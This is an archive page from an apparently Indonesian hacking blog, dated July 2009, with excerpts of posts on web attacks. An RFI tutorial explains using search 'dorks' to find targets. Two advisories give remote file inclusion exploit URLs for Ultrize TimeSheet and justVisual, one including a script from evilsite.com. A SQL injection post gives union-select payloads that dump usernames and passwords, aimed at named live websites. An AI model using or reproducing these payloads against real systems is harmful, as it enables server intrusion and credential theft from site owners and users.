July 2009 ~ matthews

Friday, July 31, 2009

RFI

1:12 AM matthews

terima kasih teman2 ku yg mau berkunjung ke blog aqsaya akan menjelaskan RFI, RFI adalah salah satu cara dalam penetrasi sebuah server melalui port 80tanpa panjang lebar langsung praktek yahcontoh:- Dork <==== adalah sebuah cara dalam mendapatkan target (artinya keyword yg kitaketik di mesin pencari seperti google) - Vulnerable file <==== adalah sebuah file dimana ada...

Ultrize TimeSheet 1.2.2 Remote File Inclusion Vulnerability

1:07 AM matthews

Software : Ultrize TimeSheet version 1.2.2 Vendor : http://www.ultrize.com/ Download : http://www.ultrize.com/timesheet/download/timeSheet-20080505.zip Author : NoGe ===================================================================================== [o] Vulnerable file include($config['include_dir'].'timesheet.class.php'); include/timesheet.php [o] Exploit http://localhost/[path]/include/timesheet.php?config[include_dir]=[evilc0de]==================================================================...

justVisual 1.2 (fs_jVroot) Remote File Inclusion Vulnerabilities

1:06 AM matthews

#################################################################################################################[+] justVisual 1.2 (fs_jVroot) Remote File Inclusion Vulnerabilities[+] Discovered By SirGod[+] http://insecurity-ro.org[+] http://h4cky0u.org##################################################################################################################[+] Download : http://www.fh54.de/justVisual/justVisual_1.2.zip[+] Remote File Inclusion- Vulnerable code is everywhere- PoC's http://127.0.0.1/path/justVisual/sites/site/pages/index.php?fs_jVroot=http://evilsite.com/evilscript.txt...

12:36 AM matthews

linkSpheric 0.74 Beta 6 SQL Inejction Vuln Thursday, July 31, 2009 [o] linkSpheric 0.74 Beta 6 SQL Inejction VulnerabilitySoftware : linkSpheric version 0.74 Beta 6Vendor : http://dataspheric.com/Download : http://sourceforge.net/projects/linkspheric/Referensi: NoGe[o] Vulnerable fileviewListing.php[o] Exploithttp://localhost/[path]/viewListing.php?listID=[SQL][o] Proof of concepthttp://dataspheric.com/directory/viewListing.php?listID=-52+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,group_concat(userName,0x3a,password),21,22,23,24,25,26,27,28+from+users--http://pcmsite.net/links/viewListing.php?listID=-5+union+select+1,2,3,4,5,6,7,8,group_concat(userName,0x3a,password),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+users--[o]...

matthews

Friday, July 31, 2009

RFI

Ultrize TimeSheet 1.2.2 Remote File Inclusion Vulnerability

justVisual 1.2 (fs_jVroot) Remote File Inclusion Vulnerabilities

Popular Posts

Link for education

About Me

Blog Archive

Categories

news from Kecoak Elektronik Indonesia

news from SecurityFocus Vulnerabilities

adsensecamp

adbrite2

News from milw0rm

Labels

Blog Archive

Blogger templates

Blogger news

Location

Blogroll